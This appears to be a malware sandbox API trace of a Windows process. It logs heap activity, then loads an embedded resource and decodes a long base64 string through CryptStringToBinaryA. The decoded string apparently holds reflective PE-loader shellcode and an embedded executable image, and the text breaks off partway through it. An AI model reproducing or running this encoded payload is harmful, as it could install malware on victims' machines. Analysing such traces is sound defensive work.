[0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x37) returned 0x5e0bc8 [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.367] SetLastError (dwErrCode=0x0) [0022.367] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.368] GetLastError () returned 0x0 [0022.368] SetLastError (dwErrCode=0x0) [0022.369] GetLastError () returned 0x0 [0022.369] SetLastError (dwErrCode=0x0) [0022.369] GetLastError () returned 0x0 [0022.369] SetLastError (dwErrCode=0x0) [0022.369] GetLastError () returned 0x0 [0022.369] SetLastError (dwErrCode=0x0) [0022.369] GetLastError () returned 0x0 [0022.369] SetLastError (dwErrCode=0x0) [0022.369] GetLastError () returned 0x0 [0022.369] SetLastError (dwErrCode=0x0) [0022.369] GetLastError () returned 0x0 [0022.369] SetLastError (dwErrCode=0x0) [0022.369] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] GetLastError () returned 0x0 [0022.370] SetLastError (dwErrCode=0x0) [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x98) returned 0x5e0c08 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1f) returned 0x5ddbb8 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x36) returned 0x5e0ca8 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x37) returned 0x5e0ce8 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5e0d28 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x31) returned 0x5e0d70 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x5e0db0 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5e0dd0 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x5e0e00 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xd) returned 0x5e0e20 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x25) returned 0x5e0e38 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x39) returned 0x5e0e68 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5e0eb0 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x5e0ed0 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x5e0ef0 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x69) returned 0x5e0f08 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3e) returned 0x5e0f80 [0022.370] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1b) returned 0x5ddbe0 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1d) returned 0x5ddc08 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x5df958 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5e0fc8 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5df9a8 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1b) returned 0x5ddc30 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5df9c8 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x29) returned 0x5df9f8 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x5ddc58 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x41) returned 0x5dfa30 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x5dfa80 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xf) returned 0x5dfaa0 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x16) returned 0x5dfab8 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2a) returned 0x5dfad8 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x29) returned 0x5dfb10 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x15) returned 0x5dfb48 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x5ddc80 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2a) returned 0x5dfb68 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5dfba0 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5dfbc0 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x46) returned 0x5dfbe0 [0022.371] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e0430 | out: hHeap=0x5d0000) returned 1 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x80) returned 0x5dfc30 [0022.371] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x800) returned 0x5dfcb8 [0022.372] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0022.372] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13418c3) returned 0x0 [0022.372] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5dfc30) returned 0x80 [0022.372] GetLastError () returned 0x0 [0022.372] SetLastError (dwErrCode=0x0) [0022.372] GetLastError () returned 0x0 [0022.372] SetLastError (dwErrCode=0x0) [0022.372] GetLastError () returned 0x0 [0022.372] SetLastError (dwErrCode=0x0) [0022.372] GetLastError () returned 0x0 [0022.372] SetLastError (dwErrCode=0x0) [0022.372] GetLastError () returned 0x0 [0022.372] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.373] SetLastError (dwErrCode=0x0) [0022.373] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.374] GetLastError () returned 0x0 [0022.374] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] GetLastError () returned 0x0 [0022.375] SetLastError (dwErrCode=0x0) [0022.375] FindResourceA (hModule=0x0, lpName=0x65, lpType=0xa) returned 0x1354280 [0022.378] LoadResource (hModule=0x0, hResInfo=0x1354280) returned 0x13542d0 [0022.378] SizeofResource (hModule=0x0, hResInfo=0x1354280) returned 0xa7de9 [0022.378] LockResource (hResData=0x13542d0) returned 0x13542d0 [0022.378] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x759b0000 [0022.779] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0022.785] CryptStringToBinaryA (in: pszString="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